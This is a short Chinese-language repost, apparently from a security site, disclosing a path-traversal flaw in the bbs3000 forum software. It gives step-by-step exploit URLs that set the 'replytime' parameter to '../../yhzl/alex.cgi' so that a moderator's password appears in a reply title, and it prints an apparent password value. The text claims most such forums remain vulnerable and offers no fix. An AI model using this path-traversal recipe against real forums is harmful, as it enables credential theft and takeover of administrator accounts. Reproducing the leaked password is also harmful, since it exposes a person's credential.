 回复帖子的URL为:
http://www.target.com/cgi-bin/bbs/bbs.cgi?
menu=addreply&id=200211122156&replytime=20031206103655"e=1&yjhf=nongdu@sohu.com
replytime这个是表单值,addreply.cgi对表单变量未过滤
将replytime改成../../yhzl/alex.cgi。其中alex为区长
所以地址变成:
http://www.target.com/cgi-bin/bbs/bbs.cgi?
menu=addreply&id=200211122156&replytime=../../yhzl/alex.cgi"e=1&yjhf=nongdu@sohu.
com
这样提交后,在文章标题里会出现 RE:19830930
聪明的就能看出来19830930就是alex这个区长的密码
此漏洞是envymask在3月发现的
到现在这个漏洞知道的不多,而且仍然90%的bbs3000论坛存在漏洞
我再次公布出来是希望大家能引起注意,将网络安全进行到底! 【转自世纪安全网 http://www.21safe.com】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)